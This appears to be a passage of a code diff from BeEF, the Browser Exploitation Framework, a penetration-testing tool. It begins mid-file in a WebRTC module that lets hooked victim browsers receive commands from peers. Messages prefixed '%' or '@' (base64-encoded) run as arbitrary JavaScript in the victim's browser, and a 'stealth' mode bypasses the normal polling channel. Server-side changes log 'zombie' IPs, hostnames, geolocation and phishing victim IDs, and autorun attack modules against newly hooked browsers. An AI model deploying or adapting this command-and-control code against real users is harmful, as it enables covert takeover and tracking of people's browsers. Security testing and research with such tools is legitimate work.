+  rtcrecvchan[peerid] = event.channel;
+
+  // This is the onmessage event handling within the datachannel
+  rtcrecvchan[peerid].onmessage = function(ev2) {
+    beef.debug("Received an RTC message from my peer["+peerid+"]: " + ev2.data);
+
+    // We've received the command to go into stealth mode
+    if (ev2.data == "!gostealth") {
+        if (beef.updater.lock == true) {
+            setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
+        } else {
+            beefrtcs[peerid].goStealth();
+        }
+
+    // The message to come out of stealth
+    } else if (ev2.data == "!endstealth") {
+
+      if (rtcstealth != null) {
+        beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
+        rtcstealth = false;
+      }
+
+    // Command to perform arbitrary JS (while stealthed)
+    } else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
+      beef.debug('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');
+      beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
+
+    // Command to perform arbitrary JS (while NOT stealthed)
+    } else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
+      beef.debug('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));
+      beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
+
+    // B64d command from the /cmdexec API
+    } else if (ev2.data.charAt(0) == "@") {
+      beef.debug('message was a b64d command');
+
+      var fn = new Function(atob(ev2.data.substring(1)));
+      fn();
+      if (rtcstealth != false) { // force stealth back on ?
+        beef.updater.execute_commands(); // FORCE execution while stealthed
+        beef.updater.lock = true;
+      }
+
+
+    // Just a plain text message .. (while stealthed)
+    } else if (rtcstealth != false) {
+      beef.debug('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');
+      beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
+
+    // Just a plan text message (while NOT stealthed)
+    } else {
+      beef.debug('received a message from peer['+peerid+'] - sending it back to beef');
+      beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
+    }
+  } 
+}
+
+// How the browser executes received JS (this is pretty hacky)
+Beefwebrtc.prototype.execCmd = function(input) {
+  var fn = new Function(input);
+  var res = fn();
+  return res.toString();
+}
+
+// Shortcut function to SEND a data messsage
+Beefwebrtc.prototype.sendPeerMsg = function(msg) {
+  beef.debug('sendPeerMsg to ' + this.peerid);
+  this.dataChannel.send(msg);
+}
+
+// Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
+Beefwebrtc.prototype.maybeStart = function() {
+  beef.debug("maybe starting ... ");
+
+  if (!this.started && this.signalingReady && this.turnDone) {
+    beef.debug('Creating PeerConnection.');
+    this.createPeerConnection();
+
+    this.started = true;
+
+    if (this.initiator) {
+      beef.debug("Making the call now .. bzz bzz");
+      this.doCall();
+    } else {
+      beef.debug("Receiving a call now .. somebuddy answer da fone?");
+      this.calleeStart();
+    }
+
+  } else {
+    beef.debug("Not ready to start just yet..");
+  }
+}
+
+// RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
+Beefwebrtc.prototype.doCall = function() {
+  var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
+  var self = this;
+  globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
+  beef.debug('Sending offer to peer, with constraints: \n' +
+             '  \'' + JSON.stringify(constraints) + '\'.');
+}
+
+// Helper method to merge SDP constraints
+Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
+  var merged = cons1;
+  for (var name in cons2.mandatory) {
+    merged.mandatory[name] = cons2.mandatory[name];
+  }
+  merged.optional.concat(cons2.optional);
+  return merged;
+}
+
+// Sets the local RTC session description, sends this information back (via signalling)
+// The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
+// The receiver uses this information too - and vice-versa - hence the signaling
+Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
+  // This fucking function does NOT receive a 'this' state, and you can't pass additional parameters
+  // Stupid .. javascript :(
+  // So I'm hacking it to find the peerid gah - I believe *this* is what means you can't establish peers concurrently
+  // i.e. this browser will have to wait for this peerconnection to establish before attempting to connect to the next one..
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+  beef.debug("For peer: " + peerid + " Running setLocalAndSendMessage...");
+
+  globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
+  beefrtcs[peerid].sendSignalMsg(sessionDescription);
+
+  function onSetSessionDescriptionSuccess() {
+    beef.debug('Set session description success.');
+  }
+
+  function onSetSessionDescriptionError() {
+    beef.debug('Failed to set session description');
+  }
+}
+
+// If the browser can't build an SDP
+Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
+  beef.debug('Failed to create session description: ' + error.toString());
+}
+
+// If the browser successfully sets a remote description
+Beefwebrtc.prototype.onSetRemoteDescriptionSuccess = function() {
+  beef.debug('Set remote session description successfully');
+}
+
+// Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
+Beefwebrtc.prototype.calleeStart = function() {
+  // Callee starts to process cached offer and other messages.
+  while (this.msgQueue.length > 0) {
+    this.processSignalingMessage(this.msgQueue.shift());
+  }
+}
+
+// Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
+Beefwebrtc.prototype.processSignalingMessage = function(message) {
+  if (!this.started) {
+    beef.debug('peerConnection has not been created yet!');
+    return;
+  }
+
+  if (message.type === 'offer') {
+    beef.debug("Processing signalling message: OFFER");
+    if (navigator.mozGetUserMedia) { // Mozilla shim fuckn shit - since the new
+                                     // version of FF - which no longer works
+        beef.debug("Moz shim here");
+        globalrtc[this.peerid].setRemoteDescription(
+            new RTCSessionDescription(message),
+            function() {
+              // globalrtc[this.peerid].createAnswer(function(answer) {
+              //   globalrtc[this.peerid].setLocalDescription(
+
+              var peerid = null;
+
+              for (var k in beefrtcs) {
+                if (beefrtcs[k].allgood === false) {
+                  peerid = beefrtcs[k].peerid;
+                }
+              }
+
+              globalrtc[peerid].createAnswer(function(answer) {
+                globalrtc[peerid].setLocalDescription(
+                    new RTCSessionDescription(answer),
+                    function() {
+                      beefrtcs[peerid].sendSignalMsg(answer);
+                    },function(error) {
+                      beef.debug("setLocalDescription error: " + error);
+                    });
+              },function(error) {
+                beef.debug("createAnswer error: " +error);
+              });
+            },function(error) {
+              beef.debug("setRemoteDescription error: " + error);
+            });
+                          
+    } else {
+      this.setRemote(message);
+      this.doAnswer();
+    }
+  } else if (message.type === 'answer') {
+    beef.debug("Processing signalling message: ANSWER");
+    if (navigator.mozGetUserMedia) { // terrible moz shim - as for the offer
+        beef.debug("Moz shim here");
+        globalrtc[this.peerid].setRemoteDescription(
+          new RTCSessionDescription(message),
+          function() {},
+          function(error) {
+            beef.debug("setRemoteDescription error: " + error);
+          });
+    } else {
+      this.setRemote(message);
+    }
+  } else if (message.type === 'candidate') {
+    beef.debug("Processing signalling message: CANDIDATE");
+    var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
+                                         candidate: message.candidate});
+    this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
+    globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
+  } else if (message.type === 'bye') {
+    this.onRemoteHangup();
+  }
+}
+
+// Used to set the RTC remote session
+Beefwebrtc.prototype.setRemote = function(message) {
+    globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
+       this.onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
+}
+
+// As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
+Beefwebrtc.prototype.doAnswer = function() {
+  beef.debug('Sending answer to peer.');
+  globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
+}
+
+// Helper method to determine what kind of ICE Candidate we've received
+Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
+  if (candidateSDP.indexOf("typ relay ") >= 0)
+    return "TURN";
+  if (candidateSDP.indexOf("typ srflx ") >= 0)
+    return "STUN";
+  if (candidateSDP.indexOf("typ host ") >= 0)
+    return "HOST";
+  return "UNKNOWN";
+}
+
+// Event handler for successful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
+  beef.debug('AddIceCandidate success.');
+}
+
+// Event handler for unsuccessful addition of ICE Candidates
+Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
+  beef.debug('Failed to add Ice Candidate: ' + error.toString());
+}
+
+// If a peer hangs up (we bring down the peerconncetion via the stop() method)
+Beefwebrtc.prototype.onRemoteHangup = function() {
+  beef.debug('Session terminated.');
+  this.initiator = 0;
+  // transitionToWaiting();
+  this.stop();
+}
+
+// Bring down the peer connection
+Beefwebrtc.prototype.stop = function() {
+  this.started = false; // we're no longer started
+  this.signalingReady = false; // signalling isn't ready
+  globalrtc[this.peerid].close(); // close the RTCPeerConnection option
+  globalrtc[this.peerid] = null; // Remove it
+  this.msgQueue.length = 0; // clear the msgqueue
+  rtcstealth = false; // no longer stealth
+  this.allgood = false; // allgood .. NAH UH
+}
+
+// The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
+// These are the methods which are executed via the custom extension of the hook.js
+beef.webrtc = {
+  // Start the RTCPeerConnection process
+  start: function(initiator,peer,turnjson,stunservers,verbose) {
+    if (peer in beefrtcs) {
+      // If the RTC peer is not in a good state, try kickng it off again
+      // This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
+      if (beefrtcs[peer].allgood == false) {
+        beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
+        beefrtcs[peer].initialize();
+      }
+    } else {
+      // Standard behaviour for new peer connections
+      beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
+      beefrtcs[peer].initialize();
+    }
+  },
+
+  // Check the status of all my peers .. 
+  status: function(me) {
+    if (Object.keys(beefrtcs).length > 0) {
+      for (var k in beefrtcs) {
+        if (beefrtcs.hasOwnProperty(k)) {
+          beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
+        }
+      }
+    } else {
+      beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
+    }
+  }
+}
+beef.regCmp('beef.webrtc');
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -86,7 +86,9 @@ module Banners
        print_success "running on network interface: #{host}"
        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
+        if configuration.get("beef.extension.admin_ui.enable")
+          data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
+        end
        
        print_more data
      end
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -18,6 +18,7 @@ module BeEF
        @options[:ext_config] = ""
        @options[:port] = ""
        @options[:ws_port] = ""
+        @options[:interactive] = false


        @already_parsed = false
@@ -54,6 +55,10 @@ module BeEF
              opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
                @options[:ws_port] = ws_port
              end
+
+              opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
+                @options[:interactive] = true
+              end
            end

            optparse.parse!
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -20,6 +20,8 @@ module BeEF
        OS_MAC_IMG = 'mac.png'
        OS_QNX_UA_STR = 'QNX'
        OS_QNX_IMG = 'qnx.ico'
+        OS_SUNOS_UA_STR = 'SunOS'
+        OS_SUNOS_IMG = 'sunos.gif'
        OS_BEOS_UA_STR = 'BeOS'
        OS_BEOS_IMG = 'beos.png'
        OS_OPENBSD_UA_STR = 'OpenBSD'
@@ -54,6 +56,8 @@ module BeEF
              OS_MAC_UA_STR
            when /qnx/
              OS_QNX_UA_STR
+            when /sun/
+              OS_SUNOS_UA_STR
            when /beos/
              OS_BEOS_UA_STR
            when /openbsd/
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -39,6 +39,23 @@ module Core
      config.set('beef.api_token', token)
      token
    end
+
+    # Generates a unique identifier for DNS rules.
+    #
+    # @return [String] 8-character hex identifier
+    def self.dns_rule_id
+      id = nil
+      length = 4
+
+      begin
+        id = OpenSSL::Random.random_bytes(length).unpack('H*')[0]
+        BeEF::Core::Models::Dns::Rule.each { |rule| throw StandardError if id == rule.id }
+      rescue StandardError
+        retry
+      end
+
+      id.to_s
+    end
  
  end
 end
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -38,10 +38,17 @@ module BeEF
          zombie.firstseen = Time.new.to_i

          # hostname
+          log_zombie_port = 0
          if not @data['results']['HostName'].nil? then
            log_zombie_domain=@data['results']['HostName']
          elsif (not @data['request'].referer.nil?) and (not @data['request'].referer.empty?)
-            log_zombie_domain=@data['request'].referer.gsub('http://', '').gsub('https://', '').split('/')[0]
+            referer = @data['request'].referer
+            if referer.start_with?("https://") then
+              log_zombie_port = 443
+            else
+              log_zombie_port = 80
+            end
+            log_zombie_domain=referer.gsub('http://', '').gsub('https://', '').split('/')[0]
          else
            log_zombie_domain="unknown" # Probably local file open
          end
@@ -51,7 +58,6 @@ module BeEF
            log_zombie_port=@data['results']['HostPort']
          else
            log_zombie_domain_parts=log_zombie_domain.split(':')
-            log_zombie_port=80
            if log_zombie_domain_parts.length > 1 then
              log_zombie_port=log_zombie_domain_parts[1].to_i
            end
@@ -62,10 +68,10 @@ module BeEF

          #Parse http_headers. Unfortunately Rack doesn't provide a util-method to get them :(
          @http_headers = Hash.new
-          http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'}
-                      .each {|key,value|
-                            @http_headers[key.sub(/^HTTP_/, '')] = value
-                      }
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }
+          .each { |key, value|
+            @http_headers[key.sub(/^HTTP_/, '')] = value
+          }
          zombie.httpheaders = @http_headers.to_json
          zombie.save
          #print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
@@ -80,6 +86,21 @@ module BeEF
            self.err_msg "Invalid browser name returned from the hook browser's initial connection."
          end

+          # lookup zombie host name
+          ip_str = zombie.ip
+          if config.get('beef.dns_hostname_lookup')
+            begin
+              require 'resolv'
+              host_name = Resolv.getname(zombie.ip).to_s
+              if BeEF::Filters.is_valid_hostname?(host_name)
+                ip_str += " [#{host_name}]"
+              end
+            rescue
+              print_debug "[INIT] Reverse lookup failed - No results for IP address '#{zombie.ip}'"
+            end
+          end
+          BD.set(session_id, 'IP', ip_str)
+
          # geolocation
          if config.get('beef.geoip.enable')
            require 'geoip'
@@ -91,37 +112,37 @@ module BeEF
              else
                #print_debug "[INIT] Geolocation results: #{geoip}"
                BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
-                BD.set(session_id, 'LocationCity',          "#{geoip['city_name']}")
-                BD.set(session_id, 'LocationCountry',       "#{geoip['country_name']}")
-                BD.set(session_id, 'LocationCountryCode2',  "#{geoip['country_code2']}")
-                BD.set(session_id, 'LocationCountryCode3',  "#{geoip['country_code3']}")
+                BD.set(session_id, 'LocationCity', "#{geoip['city_name']}")
+                BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}")
+                BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}")
+                BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}")
                BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
-                BD.set(session_id, 'LocationPostCode',      "#{geoip['postal_code']}")
-                BD.set(session_id, 'LocationLatitude',      "#{geoip['latitude']}")
-                BD.set(session_id, 'LocationLongitude',     "#{geoip['longitude']}")
-                BD.set(session_id, 'LocationDMACode',       "#{geoip['dma_code']}")
-                BD.set(session_id, 'LocationAreaCode',      "#{geoip['area_code']}")
-                BD.set(session_id, 'LocationTimezone',      "#{geoip['timezone']}")
-                BD.set(session_id, 'LocationRegionName',    "#{geoip['real_region_name']}")
+                BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}")
+                BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}")
+                BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}")
+                BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}")
+                BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}")
+                BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}")
+                BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}")
              end
            else
              print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
-              print_more  "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
+              print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
            end
          end

          # detect browser proxy
          using_proxy = false
          [
-            'CLIENT_IP',
-            'FORWARDED_FOR',
-            'FORWARDED',
-            'FORWARDED_FOR_IP',
-            'PROXY_CONNECTION',
-            'PROXY_AUTHENTICATE',
-            'X_FORWARDED',
-            'X_FORWARDED_FOR',
-            'VIA'
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'PROXY_CONNECTION',
+              'PROXY_AUTHENTICATE',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR',
+              'VIA'
          ].each do |header|
            unless JSON.parse(zombie.httpheaders)[header].nil?
              using_proxy = true
@@ -132,12 +153,12 @@ module BeEF
          # retrieve proxy client IP
          proxy_clients = []
          [
-            'CLIENT_IP',
-            'FORWARDED_FOR',
-            'FORWARDED',
-            'FORWARDED_FOR_IP',
-            'X_FORWARDED',
-            'X_FORWARDED_FOR'
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR'
          ].each do |header|
            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
          end
@@ -156,6 +177,12 @@ module BeEF
            unless proxy_server.nil?
              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
              proxy_log_string += " [server: #{proxy_server}]"
+              if config.get("beef.extension.network.enable") == true
+                if proxy_server =~ /^([\d\.]+):([\d]+)$/
+                  print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
+                  BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy')
+                end
+              end
            end
            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
          end
@@ -188,7 +215,7 @@ module BeEF
            self.err_msg "Invalid cookies returned from the hook browser's initial connection."
          end

-          # get and store the os name
+          # get and store the OS name
          os_name = get_param(@data['results'], 'OsName')
          if BeEF::Filters.is_valid_osname?(os_name)
            BD.set(session_id, 'OsName', os_name)
@@ -196,6 +223,10 @@ module BeEF
            self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
          end

+          # get and store the OS version (without checks as it can be very different or even empty, for instance on linux/bsd)
+          os_version = get_param(@data['results'], 'OsVersion')
+          BD.set(session_id, 'OsVersion', os_version)
+
          # get and store default browser
          default_browser = get_param(@data['results'], 'DefaultBrowser')
          BD.set(session_id, 'DefaultBrowser', default_browser)
@@ -290,10 +321,10 @@ module BeEF

          # get and store the yes|no value for browser components
          components = [
-            'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
-            'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
-            'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
-            'hasSessionCookies', 'hasPersistentCookies'
+              'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
+              'HasWebSocket', 'HasWebRTC', 'HasActiveX',
+              'HasQuickTime', 'HasRealPlayer', 'HasWMP',
+              'hasSessionCookies', 'hasPersistentCookies'
          ]
          components.each do |k|
            v = get_param(@data['results'], k)
@@ -320,31 +351,33 @@ module BeEF
            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
          end

-          # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
-
-
-          # Call autorun modules
-          if config.get('beef.autorun.enable')
-            autorun = []
-            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-              if v.has_key?('autorun') and v['autorun'] == true
-                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
-                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-                  BeEF::Module.execute(k, session_id)
-                  autorun.push(k)
-                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
-                  BeEF::Module.execute(k, session_id)
-                  autorun.push(k)
-                else
-                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
-                end
-              end
-            }
-            if autorun.length > 0
-              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+          if config.get('beef.integration.phishing_frenzy.enable')
+            # get and store the browser plugins
+            victim_uid = get_param(@data['results'], 'PhishingFrenzyUID')
+            print_debug "PhishingFrenzy victim UID is #{victim_uid}"
+            if BeEF::Filters.alphanums_only?(victim_uid)
+              BD.set(session_id, 'PhishingFrenzyUID', victim_uid)
+            else
+              self.err_msg "Invalid PhishingFrenzy Victim UID returned from the hook browser's initial connection."
            end
          end
+
+          # log a few info of newly hooked zombie in the console
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+
+          # add localhost as network host
+          if config.get('beef.extension.network.enable')
+            print_debug("Hooked browser has network interface 127.0.0.1")
+            BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => '127.0.0.1', :hostname => 'localhost', :os => BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName'))
+          end
+
+          # Autorun Rule Engine - Check if the hooked browser type/version and OS type/version match any Rule-sets
+          # stored in the BeEF::Core::AutorunEngine::Models::Rule database table
+          # If one or more Rule-sets do match, trigger the module chain specified
+          #
+          are = BeEF::Core::AutorunEngine::Engine.instance
+          match_rules = are.match(browser_name, browser_version, os_name, os_version)
+          are.trigger(match_rules, zombie.id) if match_rules.length > 0
        end

        def get_param(query, key)
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -42,7 +42,7 @@ module BeEF

          # @note get and check session id from the request
          beefhook = get_param(@data, 'beefhook')
-          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+          (print_error "BeEF hook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)

          result = get_param(@data, 'results')

@@ -57,11 +57,14 @@ module BeEF
          # @note get/set details for datastore and log entry
          command_friendly_name = command.friendlyname
          (print_error "command friendly name is empty"; return) if command_friendly_name.empty?
-          command_results = get_param(@data, 'results')
-          (print_error "command results are empty"; return) if command_results.empty?
+
+          command_status  = @data['status']
+          command_results = @data['results']
+          (print_error "command results or status are empty"; return) if command_results.empty?
+
          # @note save the command module results to the datastore and create a log entry
          command_results = {'data' => command_results}
-          BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results)
+          BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results, command_status)

        end

--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -79,6 +79,13 @@ module Handlers
        zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
        zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}

+        # TODO this is not considering WebSocket channel, as data is sent from core/main/handlers/modules/command.rb if WS is enabled
+        are_executions = BeEF::Core::AutorunEngine::Models::Execution.all(:is_sent => false, :session => hook_session_id)
+        are_executions.each do |are_exec|
+          @body += are_exec.mod_body
